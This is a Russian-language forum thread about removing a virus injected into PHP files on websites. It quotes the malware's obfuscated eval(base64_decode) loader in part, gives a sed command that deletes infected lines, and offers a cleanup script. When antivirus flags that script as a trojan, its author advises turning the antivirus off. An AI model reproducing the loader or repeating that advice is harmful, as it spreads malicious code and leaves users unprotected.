Регулярка для поиска вируса в файлах

Тема в разделе "Регулярные выражения", создана пользователем Roman777, 14 ноя 2013.

Модераторы: xpert13
  1. Roman777

    Roman777 Постоялец

    Регистр.:
    29 мар 2007
    Сообщения:
    130
    Симпатии:
    18
    Вот этот текст нужно найти в нескольких файлах, прошу помочь:

    Код:
    <?php /*versio:1.12*/if (!defined ("determinator")){eval(base64_decode('ZnVuY3Rpb24gdVAxUFFvWmZhZXpHN0xDSWVIek10OTczZ0RJZ2NnbDlQbWNmU0VkTkRMUUJoWGg4T2E1MEY0bGg0SDIwb0NGcSgkcWwxNk9HQTNRZkl2MlFYSjZkSEF1ZzhKbWZyRXBhaURjcm1FRnJPZFRWVFNnUjFDb0pmQVVRUDNqR3pORVV4bCl7cmV0dXJuIGV2YWwoJHFsMTZPR0EzUWZJdjJRWEo2ZEhBdWc4Sm1mckVwYWlEY3JtRUZyT2RUVlRTZ1IxQ29KZkFVUVAzakd6TkVVeGwpO307ZnVuY3Rpb24gaG9lMTdwcDRRYkVYZkZlU0dkTFZaWG5yMFFwWmY0aE5qc
    ******
    uP1PQoZfaezG7LCIeHzMt973gDIgcgl9PmcfSEdNDLQBhXh8Oa50F4lh4H20oCFq(eAfB2fdUQJEPPSFaqmnBmoh2xoHevgsmQJD1dadgRBR7qsjNgeOGT86laLloLE1l(hoe17pp4QbEXfFeSGdLVZXnr0QpZf4hNjsIbvP9FBDURhQX9raGaJVdEHdJzsq7o(\$cjULv3a3LSpp9LT13Ffq3AeTimxeCjim8qCm1U0zObFc1zOfHx5G5M9Zi6xgt0T9))); ");}?>
    найти нужно именно вместе со строками <?php ?>
    заранее спасибо и благодарность

    хорошо помогает вот такой вариант - удаляет все лишнее:

    find . -name \*.php -exec sed -i -r '/determinator/d' {} \;
    но он удаляет сразу все строки с вирусом, а мне нужно оставить <?php в первой строке
     
    Последнее редактирование: 14 ноя 2013
  2. denik

    denik Постоялец

    Регистр.:
    1 июл 2011
    Сообщения:
    80
    Симпатии:
    43
    Когда-то давно, когда я еще сохранял пароли от FTP в TotalCommander (наивный), так вышло, что все сайты что были там - заразились)))
    В последствии написал скрипт для обхода по папкам ФТП и чистки сего мусора (прикрепил к сообщению).

    Мануал:
    1. Делаем !BACKUP! всех файлов перед применением!

    2. Если надо добавить известные сигнатуры, редактируем файл ftped.php, переменная $_SIGN.
    3. Заливаем на сторонний сервер (не туда где надо чистить, чтоб скрипт сам себя не почистил)
    4. Открываем {host}/ftped/ftped.php, вводим данные и нажимаем "Пуск!"

    В конце редактирования, бэкапы всех отредактированных файлов будут сохранены в папке удаленного сервера /_backup_ftp_parse

    Скриншет:
    screenshot.png
     

    Вложения:

    • ftped.7z
      Размер файла:
      375,1 КБ
      Просмотров:
      12
    Rimon нравится это.
  3. Roman777

    Roman777 Постоялец

    Регистр.:
    29 мар 2007
    Сообщения:
    130
    Симпатии:
    18
    Антивирус пишет, что это троян (Угроза JS/Kryptik.ВМ). Может ли еще кто-то проверить?
     
  4. denik

    denik Постоялец

    Регистр.:
    1 июл 2011
    Сообщения:
    80
    Симпатии:
    43
    естественно он так пишет))) там же сигнатуры перечислены (переменная $_SIGN) :)
    более того, антивирус надо даже выключить!
     
    Rimon нравится это.